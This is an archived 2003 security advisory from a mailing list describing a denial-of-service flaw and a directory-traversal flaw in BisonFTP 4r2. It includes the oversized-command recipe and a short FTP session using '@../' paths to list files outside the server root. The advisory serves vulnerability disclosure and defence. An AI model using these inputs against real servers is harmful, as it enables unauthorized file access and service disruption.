[NT] Mulitple Vulnerabilities Found in BisonFTP (DoS, Directory Traversal @)
From: support@securiteam.com
Date: 02/17/03
- Previous message: support@securiteam.com: "[NEWS] Oracle Unauthenticated Remote System Compromise"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: 17 Feb 2003 22:29:54 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -
Mulitple Vulnerabilities Found in BisonFTP (DoS, Directory Traversal @)
------------------------------------------------------------------------
SUMMARY
<http://www.bisonftp.com/> BisonFTP Server is a native Windows FTP
Server. It offers all of the standard features other FTP Servers provide
and includes such features as S/KEY Password, File Filtering, etc. Two
security vulnerabilities have been found in the product allowing a remote
attacker to cause it to no longer be able to respond to legitimate
request, and to view files and directories that reside outside the
bounding FTP root directory.
DETAILS
Vulnerable systems:
* BisonFTP version 4r2
Denial of service:
BisonFTP is vulnerable to a DoS attack by sending ftp commands with big
data. By sending the FTP command LS or CWD with 4300 bytes or more,
BisonFTP will start 100% CPU usage until the socket is closed by the
client.
Directory Traversal:
It is possible to trick BisonFTP into revealing confidential information
about files outside ftp root.
ftp> ls @../
227 Entering PASV Mode (10,10,10,10,4,126)
150 Directory List Follows
-rwxrwxrwx 1 user group 739577 Feb 05 2002 BisonFTP42.exe
226 Listing complete.
ftp> mget @../Biso
local: BisonFTP42.exe remote: BisonFTP42.exe
227 Entering PASV Mode (10,10,10,10,4,128)
550 File does not exist
ftp>
ADDITIONAL INFORMATION
The information has been provided by <mailto:ja@immune.dk> Immune
Advisory.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Next message: support@securiteam.com: "[UNIX] CGI SAPI Security Vulnerability"
- Previous message: support@securiteam.com: "[NEWS] Oracle Unauthenticated Remote System Compromise"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
